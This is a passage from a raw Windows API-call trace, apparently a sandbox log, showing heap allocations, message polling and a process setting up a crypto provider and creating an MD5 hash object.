hHeap=0x970000) returned 1 [0259.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0259.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0259.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0259.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0259.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0259.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0259.917] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0259.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0259.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0259.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0259.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0259.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0259.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0259.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0259.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0259.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0259.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0259.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0259.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0259.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0259.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0259.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0259.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0259.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0259.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0259.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0259.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0259.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0259.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0259.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0259.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0259.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0259.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0259.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0259.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0259.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0259.919] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0259.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0259.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0259.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0259.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0259.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69a28 [0259.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69a28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0259.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0259.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0259.920] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0259.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0259.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0259.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0259.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0259.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0259.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0259.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0259.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0259.921] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0259.922] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.922] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.922] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0259.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0259.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.922] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.922] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0259.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0259.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0259.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0259.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.922] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0259.922] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0259.922] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.923] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0259.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0259.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.923] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.923] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0259.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.923] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.923] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.923] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.923] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.923] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0259.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0259.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.924] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0259.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0259.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.924] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.924] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0259.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.925] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0259.925] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0259.925] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.925] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0259.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0259.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.925] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.925] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0259.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.925] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.925] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.925] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.925] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0259.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.926] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.926] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0259.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0259.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.926] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.926] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0259.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51cb8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0259.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.926] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0259.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0259.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0259.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0259.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0259.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0259.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0259.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0259.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0259.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0259.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0259.927] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0259.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0259.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0259.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0259.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0259.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0259.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0259.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0259.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0259.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0259.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0259.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0259.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 